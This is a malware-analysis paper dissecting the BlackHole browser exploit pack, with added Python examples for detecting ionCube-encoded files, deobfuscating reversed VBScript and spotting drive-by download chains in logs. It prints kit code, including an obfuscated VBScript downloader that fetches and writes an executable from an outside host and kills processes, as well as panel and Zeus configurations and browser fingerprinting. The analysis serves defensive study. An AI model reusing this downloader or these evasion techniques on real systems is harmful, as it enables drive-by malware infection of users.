BROWSER EXPLOIT PACKS – EXPLOITATION TACTICS


Aditya K Sood, Richard J. Enbody
Department of Computer Science and Engineering, Michigan State University, East Lansing, MI 48824-1226, USA
Email {soodadit, enbody}@cse.msu.edu

ABSTRACT

Browser exploit packs have been increasingly used for spreading malware. They use the browser as a medium to infect users. This paper analyses the BlackHole exploit pack, and sheds light on the tactics used to distribute malware across the web.

INTRODUCTION

Malware infection is proliferating. In spite of new advanced protection features, it has become difficult to protect against infections that happen through browsers. The rise of Browser Exploit Packs (BEPs) [1] plays a significant role in the success of malware infections. BEPs thrive by exploiting the browsers' vulnerabilities, and attackers have demonstrated a lot of maturity and expertise in developing their exploits. BEPs are usually used in conjunction with botnets and use drive-by-download attacks to load the malware binary onto the victim's machine. Browser exploit packs such as Fragus, Fiesta, Yes, Crimepack, Phoenix, Red Dice, MPack, SPack, and Bleeding Life have demonstrated this kind of nefarious behaviour. This work is a result of extensive analysis of the BlackHole BEP [2, 3], one of the most widely used BEPs because of its use with the Zeus and SpyEye botnets. In this paper, we emphasize the following aspects:

- Analysis of the BlackHole Browser Exploit Pack.
- Code auditing of the BlackHole BEP in order to derive exploitation and malware spreading techniques.

Our basic premise is that it is crucial to analyse the source code in order to understand the intrinsic behaviour of the malware when it is running. In this paper, we dissect the source code to derive the exploitation methods used by the BlackHole BEP.

BACKGROUND AND RELATED WORK

Niel [4] described the basic exploit-based mechanisms in use in existing malware.
Niel generalized web malware considering the infections that are an outcome of third-party widgets, advertisers, user-contributed content and web server vulnerabilities. Michael [5] has extended this work to show how malware is used to build botnets. In addition, a study [6] has been conducted to show how the malware exploits the OS components for malicious purposes and to investigate its repercussions. Further, some of the challenges in detecting botnets [7] during crawling mechanisms have been discussed to analyse the impact of distributed botnets.

In our study, we add to that work by explicitly looking into BEPs to understand their design and the common tactics used to infect the victims. We will present exploitation techniques used to spread malware derived from static and dynamic analysis of the BlackHole BEP.

BROWSER DESIGN AGILITY

Design agility in the browser architectural model refers to the robust design of the browser components. Of course, no design is perfect, and every design has weaknesses that cannot be removed completely. Such weaknesses can result in vulnerabilities. A browser design can be considered weak based on the following criteria. First, a weakness exists if a serious design flaw persists in the various components of the browser; design errors may lead to vulnerabilities that undermine the security as well as the robustness of the browser. Second, a weakness exists if there is a possibility of subverting the extensible nature of browser components, for example an open system design with customized code that is allowed to run inline with the software. That would include an open set of APIs (Application Programming Interfaces) as well as platform-independent code. It also covers component code that can be reprogrammed and reused effectively. Third, there may be security vulnerabilities in the browser components that are most generic and stealthy.

METHODOLOGY

In order to analyse the BlackHole BEP, we collected raw samples from a variety of sources.
We used the Malware Domain List [8] and Clean MX [9] to find a number of domains that were hosting the BlackHole BEP. Figure 1 shows a sample list of the BlackHole BEP served by the Malware Domain List. It took us close to three months to get the appropriate samples by analysing the malicious domains that serve bots and browser exploit packs together. During this process, we detected that live samples of the BlackHole BEP were password protected. We applied techniques such as brute forcing and social engineering in order to gain full access to the BEP. However, this process was not easy because it was hard to find the domains that were actually serving this malware. Sometimes, we were not able to find the web pages either because the BEP was removed or deleted. We continuously monitored domains that were hosting the BlackHole BEP to track the changes so that the samples needed could be downloaded for analysis. Most of the analytical tests were conducted with virtual machines in order to maintain a controlled environment.

In this experiment, we analysed the exploit pack code and audited it completely to understand the exploitation techniques used by the BlackHole BEP. Figure 1 shows the list of infected domains that show the presence of the BlackHole BEP.

Figure 1: Malware Domain List – domains infected with the BlackHole BEP (registrant details obscured).

EXPERIMENT AND ANALYTICAL RESULTS

During analysis, we found that BlackHole BEP files were scrambled and obfuscated. In general, the BlackHole BEP is hosted in conjunction with other botnets and uses PHP as a base to manage the framework. We present our analytical results in the following sections.

BlackHole configuration

The BlackHole BEP displays a sophisticated design that looks like a complete malware framework. For example, BlackHole uses an AJAX-based environment to support different types of widgets. Basically, the design allows every widget to communicate with the target independently and allows automatic updates. The widgets' primary role is to keep track of the information coming back from the infected machines. This information includes the browser types, operating systems and exploits that are vulnerable and have already been exploited. BlackHole also supports custom widgets for gathering statistical data. A global variable 'time_interval' is defined to refresh the information according to that interval.

The BlackHole BEP is hosted on an XAMPP Apache distribution because it is lightweight and easy to use. BlackHole is made of PHP, HTML and Jar files. PHP files are usually encrypted with an obfuscator. However, exploits are basically programmed as inline scripts within PHP pages. As the PHP pages are accessed by a user, inline exploits are rendered as HTML and DOM content to drop malicious executables by exploiting vulnerabilities in the browser components or plug-ins. These HTML files primarily consist of exploitable browser code that generally uses JavaScript heap spraying techniques. Listing 1 shows the configuration file used by the BlackHole BEP. This file uses some interesting metrics that control the working of the overall framework. For example, the 'reuse_iframe' parameter is defined for using the same iframe for serving exploits. By default, each exploit in the BlackHole BEP is created in its own iframe. The 'exploit_delay' parameter is configured to set an appropriate time delay in serving the exploits consecutively. The 'config_url' parameter is defined for specifying the host address where the BlackHole panel is hosted. The 'payload_filename' parameter uses a default payload that is required to be included in every new exploit. The 'enable_signed' parameter is applied to control the signed Java applets, which further require user interaction.

[BlackHole Configuration File]
<?php
$sqlSettings['dbHost'] = 'localhost';
$sqlSettings['dbUsername'] = 'root';
$sqlSettings['dbPassword'] = 'xxxxx';
$sqlSettings['dbName'] = 'zain2';
$sqlSettings['tableVisitorsList'] = 'visitors_list';
$panel_user = "zain";
$panel_pass = "xxxxx";
$enable_signed = false;
$payload_filename = 'payload.exe';
$config_url = 'http://malicious.com/bl2';
$exploit_delay = 5000;
$reuse_iframe = false;
$ajax_stats = true;
$ajax_delay = 5000;
?>

Listing 1: BlackHole BEP – configuration file.

Exploit obfuscation and encoding

The BlackHole BEP uses two different methods to obfuscate its PHP code. First, it uses ionCube [10], a standard PHP encoder, in order to encode all the PHP files as presented in Listing 2. Table 1 shows the ionCube DLLs for different PHP versions that are used in encoding the BlackHole BEP framework. The 'extension_loaded' function loads the ionCube dynamic library based on the information collected by the 'php_uname' and 'phpversion' functions. The 'php_uname' function is used to gather information about the operating system on which PHP is running. The 'phpversion' function reveals information about the running PHP that is installed on the server. ionCube first collects the PHP version information and uses specific DLLs in order to encode the BlackHole BEP PHP files appropriately. With the use of the ionCube encoder, it becomes really hard to analyse the BlackHole BEP.

<?php
if(!extension_loaded('ionCube Loader')){
  $__oc=strtolower(substr(php_uname(),0,3));
  $__ln='/ioncube/ioncube_loader_'.$__oc.'_'.substr(phpversion(),0,3).(($__oc=='win')?'.dll':'.so');
  $__oid=$__id=realpath(ini_get('extension_dir'));
  $__here=dirname(__FILE__);
  if(strlen($__id)>1&&$__id[1]==':'){
    $__id=str_replace('\\','/',substr($__id,2));
    $__here=str_replace('\\','/',substr($__here,2));
  }
  $__rd=str_repeat('/..',substr_count($__id,'/')).$__here.'/';
  ...
}
?>

Listing 2: ionCube encoder in the BlackHole BEP.

SNo | BlackHole BEP files
1   | ioncube_loader_win_4.1.dll
2   | ioncube_loader_win_4.2.dll
3   | ioncube_loader_win_4.3.dll
4   | ioncube_loader_win_4.4.dll
5   | ioncube_loader_win_5.0.dll
6   | ioncube_loader_win_5.1.dll

Table 1: ionCube DLL version specific to PHP version.

Second, the BlackHole BEP also uses reverse encoding and concatenation in generating remote objects in VBScript. A code snippet present in Listing 3 shows that the BlackHole BEP applies extensive reverse calls in order to make the analysis somewhat harder.

Exploit distribution and infections

By performing continuous analysis and deobfuscation of sample code, we found that the BlackHole BEP serves a number of exploits for specific CVEs as presented in Table 2. After carefully analysing the exploit list, we find that these exploits are the most reliable ones and their ratio of successful execution is high. Further, the most used exploits in the BlackHole BEP are CVE-2010-0840 [11] and CVE-2010-0842 [12]. These vulnerabilities have been found in the Java Open Business Engine (OBE) and Java workflow engine [13]. Since Java is platform independent, this flaw can be exploited easily on any type of browser. In general, a third-party vulnerability (such as a Java plug-in) results in a compromise of all types of browsers running on different operating systems. As a result of this, the infection rate is quite high due to the ease of exploiting these Java vulnerabilities, as presented in Figure 2.

SNo | Year | Exploit – CVEs
1   | 2010 | CVE-2010-0188, CVE-2010-2884, CVE-2010-0842, CVE-2010-3552, CVE-2010-1297, CVE-2010-0840, CVE-2010-0806, CVE-2010-1885
2   | 2009 | CVE-2009-0927, ...

Table 2: Exploits served by the BlackHole BEP.

Figure 2: Java exploits – high infection rate.

The Java-OBE exploit discussed above is completely undetectable by anti-virus engines and executes in a stealthy manner. In other ways, BlackHole uses a standard cryptographic function in conjunction with other cryptographic algorithms in order to make code analysis harder, as well as making it hard to detect by anti-virus engines and tools like Wepawet. The BlackHole exploit pack also uses helper files that result in detection of the software version. The BlackHole BEP uses the 'plugin_detect.js' script to fingerprint the available plug-ins in the victim browser. Apart from this, we also find 'JavaOBE.jar' and a companion helper file, which support the execution of Java exploits by collecting requisite information from the victim browser. These helper files also provide the default environment required for triggering vulnerabilities.

In Listing 3, the ':a' parameter holds the value of the remote address of the domain hosting the BlackHole BEP. The StrReverse function is used to implement a normal trick in calling the code. When the code is rendered in the browser, 'tcejbOmetsySeliF.gnitpircS' is treated as 'Scripting.FileSystemObject', 'PTTHLMX.2LMXSM' is treated as 'MSXML2.XMLHTTP' and 'maertS.BDODA' is treated as 'ADODB.Stream'. We decode the VBScript to get this code. However, unwrapping the encoding layers provides better insight into the working of malicious VBScript code. This script pushes the operating system to act on wmplayer.exe and realplayer.exe (the decoded listing issues taskkill commands against them) by calling the 'WScript.Shell' object.

w=3000:x=200:y=1:z=false:a="http://malicious.su/f0d/bl2.php?i=3"
Set e=CreateObject(StrReverse("tcejbOmetsySeliF.gnitpircS")):b=e.GetSpecialFolder(2) & "\exe.exe":OT="GET"
Set c=CreateObject(StrReverse("PTTHLMX.2LMXSM")):Set d=CreateObject(StrReverse("maertS.BDODA"))
Set o=CreateObject(StrReverse("tcejbOmetsySeliF.gnitpircS"))
On Error resume next
c.open OT, a, z:c.send()
If c.Status=x Then u=c.ResponseBody:d.Open:d.Type=y:d.Write u:d.SaveToFile b:d.Close End If
CreateObject(StrReverse("llehS.tpircSW")).eXeC "taskkill /F /IM wmplayer.exe"
CreateObject(StrReverse("llehS.tpircSW")).eXeC "taskkill /F /IM realplay.exe"
Set g=o.GetFile(e.GetSpecialFolder(2) & "\" & StrReverse("sbv.l")):g.Delete:WScript.Sleep w:Set g=o.GetFile(b):g.Delete

Listing 3: BlackHole BEP – reverse VBScript calls.

Botnets collaboration

Most BEPs work collectively with botnets to spread infections across the web. During our analysis, we found that the BlackHole BEP works effectively with the Zeus botnet, a third-generation banking malware. In this particular sample, Zeus works collaboratively with BlackHole, which shows that the BEP plays a critical role in determining the success of malware infection through botnets. The sampled domain was hosting the BlackHole and Zeus panel together. Listing 4 shows that the BlackHole BEP uses the Zeus database to trigger infections by retrieving specific details about the target.

$DBHOST = "localhost";
$DBNAME = "Zeus";
$DBUSER = "root";
$DBPASS = "pass";
$ADMINPW = "aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d"; // SHA-1 hash from your password
$ACTIVATION_PASSWORD = "suckit";
$BANTIME = 86400;
$SOUND = "Disabled";
$COUNTRIES = array("RU" => "ashrfwdogsfvxn.exe", "DE" => "ashrfwdogsfvxn.exe", "US" => "ashrfwdogsfvxn.exe");

Listing 4: BlackHole BEP configured with Zeus database.

The BlackHole BEP also utilizes an anti-malware tracking system. Since the BlackHole BEP is designed as a full malware infection framework, it explicitly uses the concept of blacklisting [14]. This technique is put in practice in order to prevent malware tracking. The attacker usually feeds the entries in the form of IP addresses which indicate unusual behaviour. For example, if a security researcher is tracking a malicious domain, it is possible that the web server (malware domain) encounters consecutive requests for file downloads. Configuring the blacklists with that IP address prevents the BlackHole BEP from serving exploits because the management system discards the HTTP request and no positive response is sent back. The 'IP-Url-list.txt' file is used in BlackHole to blacklist domains, as shown in Figure 3.

Figure 3: BlackHole BEP – blacklist implementation.

Tracking infected systems

Further, most BEPs will use a GeoIP location library to keep track of the infections occurring on a per-country basis. It has been shown that the MaxMind [15] free GNU library is used periodically in all BEPs in order to derive statistics. The BlackHole BEP uses the same GeoIP library. A brief code snippet is presented in Listing 5 which shows how the BEP uses modular functions to fetch information related to countries based on GeoIP location.

VIRUS BULLETIN CONFERENCE OCTOBER 2011
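The loader stub in Listing 2 above and the loader library names in Table 1 give an incident responder two cheap signatures for spotting ionCube-encoded files on a seized or compromised web root. The following Python script is an added example written for this page, not code from the paper or from the BlackHole kit: it walks a directory, flags PHP files that carry the loader stub or a long opaque encoded body, and flags bundled ioncube_loader_*.dll/.so files by name. The sample web root it builds (file names, the stub excerpt and the opaque body) is constructed for the demonstration; the 200-character blob threshold and the 4 KB head window are assumptions.

```python
import os
import re
import tempfile

# Loader stub signature, as it appears in Listing 2 of the paper.
IONCUBE_STUB = re.compile(r"extension_loaded\(\s*['\"]ionCube Loader['\"]\s*\)")
# Loader library file names follow the ioncube_loader_<os>_<phpver>.(dll|so) scheme of Table 1.
IONCUBE_LOADER_FILE = re.compile(r"^ioncube_loader_[a-z]{3}_\d\.\d\.(?:dll|so)$")
# The encoded body of an ionCube file is one long opaque run of base64-style characters
# (200 characters is an assumed threshold, not a value from the paper).
OPAQUE_BLOB = re.compile(r"[A-Za-z0-9+/=]{200,}")


def classify_php_source(text):
    """Return the indicators found in one PHP file's text (empty list = looks like plain PHP)."""
    indicators = []
    head = text[:4096]  # the loader stub sits at the top of an encoded file
    if IONCUBE_STUB.search(head):
        indicators.append("ioncube-loader-stub")
    if OPAQUE_BLOB.search(text):
        indicators.append("opaque-blob")
    return indicators


def scan_tree(root):
    """Walk a web root and map relative path -> indicators for every suspicious file."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if IONCUBE_LOADER_FILE.match(name):
                findings[rel] = ["bundled-ioncube-loader"]
                continue
            if not name.lower().endswith((".php", ".inc")):
                continue
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                indicators = classify_php_source(fh.read())
            if indicators:
                findings[rel] = indicators
    return findings


def build_demo_tree():
    """Create a constructed web root for the demonstration and return its path."""
    root = tempfile.mkdtemp(prefix="bep-triage-")
    os.makedirs(os.path.join(root, "ioncube"))
    os.makedirs(os.path.join(root, "lib"))
    # Constructed stand-in for an ionCube-encoded page: loader stub followed by an opaque body.
    encoded = (
        "<?php //0046b\n"
        "if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3));"
        "/* ...loader stub continues... */}\n"
        "?>\n" + "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo" * 10 + "\n"
    )
    samples = {
        "index.php": encoded,
        "config.php": "<?php\n$sqlSettings['dbHost'] = 'localhost';\n?>\n",
        "lib/helper.php": "<?php\nfunction hello() { return 'hi'; }\n?>\n",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    # Constructed empty stand-in for a bundled loader binary (only the file name matters here).
    with open(os.path.join(root, "ioncube", "ioncube_loader_win_5.1.dll"), "wb") as fh:
        fh.write(b"")
    return root


if __name__ == "__main__":
    for path, why in sorted(scan_tree(build_demo_tree()).items()):
        print(f"{path}: {', '.join(why)}")
```

The stub check is the reliable one; the opaque-blob heuristic also fires on legitimate embedded data (a base64 image in a template, for instance), so it is a prioritisation hint for which files to decode or hash first, not a verdict on its own.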
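Listing 3 above hides every ProgID behind StrReverse and string concatenation. A first analysis pass can undo exactly those two rewrites mechanically and then check which COM objects the script reaches for. The following Python script is an added example (not the paper's code and not part of BlackHole): it folds "a" & "b" concatenations of constant strings, resolves StrReverse("...") over literals until nothing changes, and reports watch-listed objects. The SAMPLE script is constructed in the style of Listing 3, and the watch list holds the four ProgIDs the paper names; the capability descriptions next to them are the author's own summaries.

```python
import re

# A VBScript string literal on one line; a doubled quote ("") is the escaped quote inside it.
LITERAL = r'"((?:[^"\n]|"")*)"'
# StrReverse("literal") with a single constant argument.
STRREVERSE_LITERAL = re.compile(r"StrReverse\(\s*" + LITERAL + r"\s*\)", re.IGNORECASE)
# "literal" & "literal": VBScript concatenation of two constants.
CONCAT_LITERALS = re.compile(LITERAL + r"\s*&\s*" + LITERAL)

# ProgIDs that Listing 3 reaches through StrReverse, with the capability each one grants.
WATCHLIST = {
    "Scripting.FileSystemObject": "file and folder access",
    "MSXML2.XMLHTTP": "HTTP download",
    "ADODB.Stream": "writing a binary file to disk",
    "WScript.Shell": "launching commands",
}


def fold_concat(script):
    """Merge adjacent constant-string concatenations: "ab" & "cd" -> "abcd"."""
    return CONCAT_LITERALS.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', script)


def unreverse_literals(script):
    """Resolve StrReverse("...") calls whose argument is already a plain literal."""
    return STRREVERSE_LITERAL.sub(lambda m: '"' + m.group(1)[::-1] + '"', script)


def deobfuscate(script, max_rounds=10):
    """Apply both rewrites until the text stops changing (handles chains of the two tricks)."""
    previous = None
    rounds = 0
    while script != previous and rounds < max_rounds:
        previous = script
        script = unreverse_literals(fold_concat(script))
        rounds += 1
    return script


def flag_objects(script):
    """Map each watch-listed ProgID present in the (deobfuscated) script to its capability."""
    return {pid: why for pid, why in WATCHLIST.items()
            if re.search(re.escape(pid), script, re.IGNORECASE)}


def analyse(script):
    clean = deobfuscate(script)
    return clean, flag_objects(clean)


# Constructed sample in the style of Listing 3 (not the paper's code): the ProgIDs are hidden
# behind StrReverse and, in two cases, additionally split across a "&" concatenation.
SAMPLE = r'''Set e = CreateObject(StrReverse("tcejbOmetsySeliF.gnitpircS"))
b = e.GetSpecialFolder(2) & "\exe.exe"
Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM"))
Set d = CreateObject(StrReverse("maertS." & "BDODA"))
Set s = CreateObject(StrReverse("llehS." & "tpircSW"))
'''

if __name__ == "__main__":
    clean, hits = analyse(SAMPLE)
    print(clean)
    for pid, why in hits.items():
        print(f"{pid}: {why}")
```

Only StrReverse over constant strings is handled. A literal assembled at run time (Chr calls, variables, values fetched from the network) needs an actual VBScript emulator, which is the point at which the paper's reference to a sandbox such as Wepawet takes over from static rewriting.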

The BlackHole BEP uses an advanced Traffic Distribution System (TDS) to handle data from various parts of the world. Once the location of the victim is determined, information about various metrics such as IP address, location, country, successful hits and malware downloads is collected. The TDS plays a crucial role in managing data from various sources. BlackHole uses a traffic redirection script that is visited by every infected system through HTTP. Different types of rules are configured for segregating data based on the geographical locations (IP addresses). As discussed earlier, widgets are used explicitly in BlackHole. Generally, widgets are designed to manage incoming data by separating them into desired metrics (IP addresses, country, hits, etc.) that are configured in the admin panel. Primary and secondary rules are defined to handle traffic data by redirecting the visitors to appropriate widgets.

function geoip_country_name_by_addr($gi, $addr) {
  if ($gi->databaseType == GEOIP_CITY_EDITION_REV1) {
    $record = geoip_record_by_addr($gi, $addr);
    return $record->country_name;
  } else {
    $country_id = geoip_country_id_by_addr($gi, $addr);
    if ($country_id !== false) {
      return $gi->GEOIP_COUNTRY_NAMES[$country_id];
    }
  }
  return false;
}

function getdnsattributes($l, $ip) {
  $r = new Net_DNS_Resolver();
  $r->nameservers = array("ws1.maxmind.com");
  $p = $r->search($l . "." . $ip . ".s.maxmind.com", "TXT", "IN");
  $str = is_object($p->answer[0]) ? $p->answer[0]->string() : '';
  ereg("\"(.*)\"", $str, $regs);
  $str = $regs[1];
  return $str;
}

Listing 5: BlackHole BEP – MaxMind GeoIP stat functions.

After understanding the details of the BlackHole BEP, we categorized the information gathering and exploit techniques. This process is followed in order to generalize the infection strategies. In the next section, we will discuss some of the chosen exploit serving techniques used by BEPs.

BEP TECHNIQUES

Exploit packs have the potential to steal information from users' browsers by hooking different component interfaces and exploiting vulnerabilities in the various components. The following techniques have been incorporated in the browser exploit packs for spreading malware infection and bypassing anti-virus protections.

User Agent Fingerprinting (UAF)

User agents are defined as the client applications that are used to send HTTP requests to the server. In general, user agents implement the network protocol that is required for client-server communication. From a wider perspective, the user agent parameter (request header) in the HTTP request carries information about the browser environment. The user agent parameter provides information regarding the type of browser, the operating system and the security model. As stated in RFC 2616 [16], user agent strings are meant for statistical purposes. Concurrent with the rise of infections based on BEPs, user agent fingerprinting is also proliferating. BEP writers are exploiting the functionality of the user agent because it transmits information from the victim machine to the destination. For example: the user agent transmits information as

$user_agent = $_SERVER['HTTP_USER_AGENT'];

function getbrowserver(&$MSIEversion, &$OPERAversion) {
  $uag = $_SERVER['HTTP_USER_AGENT'];
  if (strstr($uag, "Firefox")) {
    if (preg_match("#Firefox/(\\d+\\.?\\d*\\.?\\d*)#s", $uag, $mt)) {
      return "Firefox v{$mt[1]}";
    }
    return "Firefox";
  }
  ...
}

function getbrowsertype() {
  $uag = $_SERVER['HTTP_USER_AGENT'];
  if (strstr($uag, "Opera")) { return "Opera"; }
  if (strstr($uag, "Firefox")) { return "Firefox"; }
  if (strstr($uag, "MSIE")) { return "MSIE"; }
  return "Other";
}

Listing 6: UAF and exploit serving by the BlackHole BEP.
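The infection chain the paper describes (a landing page, an exploit carrier such as JavaOBE.jar, then payload.exe once the configured exploit delay has elapsed) leaves a recognisable sequence in web-server logs, which is what a responder reviewing a seized TDS host or a corporate proxy log can search for. The Python script below is an added example, not code from the paper or from BlackHole: it parses Apache combined-format lines (the paper notes BlackHole runs on an XAMPP Apache stack), groups requests per client, and reports clients that fetched an exploit carrier and then an executable within a short window, recording the carrier request's User-Agent for the fingerprinting discussion above. The log lines are constructed (documentation-range addresses, made-up paths and user agents); the 60-second window and the two extension lists are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format (client, identity, user, timestamp, request, status, size,
# referer, user agent).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Assumed carrier types (Java archives, PDF and Flash exploits) and the executable payload
# that follows a successful exploit ('payload.exe' in Listing 1).
CARRIER_EXT = (".jar", ".pdf", ".swf")
PAYLOAD_EXT = (".exe",)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    rec["file"] = rec["path"].split("?", 1)[0].lower()  # drop the query string
    return rec


def find_driveby_chains(lines, window=timedelta(seconds=60)):
    """Per client IP: a 200 for an exploit carrier followed within `window` by a 200 for an .exe."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            by_ip[rec["ip"]].append(rec)
    chains = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        for i, carrier in enumerate(recs):
            if carrier["status"] != 200 or not carrier["file"].endswith(CARRIER_EXT):
                continue
            for later in recs[i + 1:]:
                if later["ts"] - carrier["ts"] > window:
                    break
                if later["status"] == 200 and later["file"].endswith(PAYLOAD_EXT):
                    chains.append({
                        "ip": ip,
                        "carrier": carrier["path"],
                        "payload": later["path"],
                        "carrier_ua": carrier["ua"],
                        "seconds": (later["ts"] - carrier["ts"]).total_seconds(),
                    })
                    break
    return chains


# Constructed log lines (documentation-range addresses, made-up paths); not from the paper.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Oct/2011:13:55:01 +0000] "GET /bl2/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"',
    '203.0.113.10 - - [10/Oct/2011:13:55:04 +0000] "GET /bl2/JavaOBE.jar HTTP/1.1" 200 8192 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_20"',
    '203.0.113.10 - - [10/Oct/2011:13:55:09 +0000] "GET /bl2/payload.exe?i=3 HTTP/1.1" 200 204800 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_20"',
    '198.51.100.7 - - [10/Oct/2011:13:56:00 +0000] "GET /bl2/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 5.1) Opera/11.50"',
    '198.51.100.7 - - [10/Oct/2011:13:56:03 +0000] "GET /bl2/JavaOBE.jar HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 5.1) Opera/11.50"',
    '192.0.2.44 - - [10/Oct/2011:14:00:00 +0000] "GET /docs/manual.pdf HTTP/1.1" 200 91234 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/6.0"',
    '192.0.2.44 - - [10/Oct/2011:14:05:00 +0000] "GET /downloads/setup.exe HTTP/1.1" 200 4096000 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/6.0"',
]

if __name__ == "__main__":
    for chain in find_driveby_chains(SAMPLE_LOG):
        print(chain)
```

Of the three constructed clients, only the first is reported: the second never received the carrier (404), and the third fetched a PDF and an installer five minutes apart, outside the window. The window is the tuning knob; the paper's configuration file sets exploit_delay to 5000 ms, so a short window already covers the kit's own pacing, while a longer one trades precision for catching slower chains.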
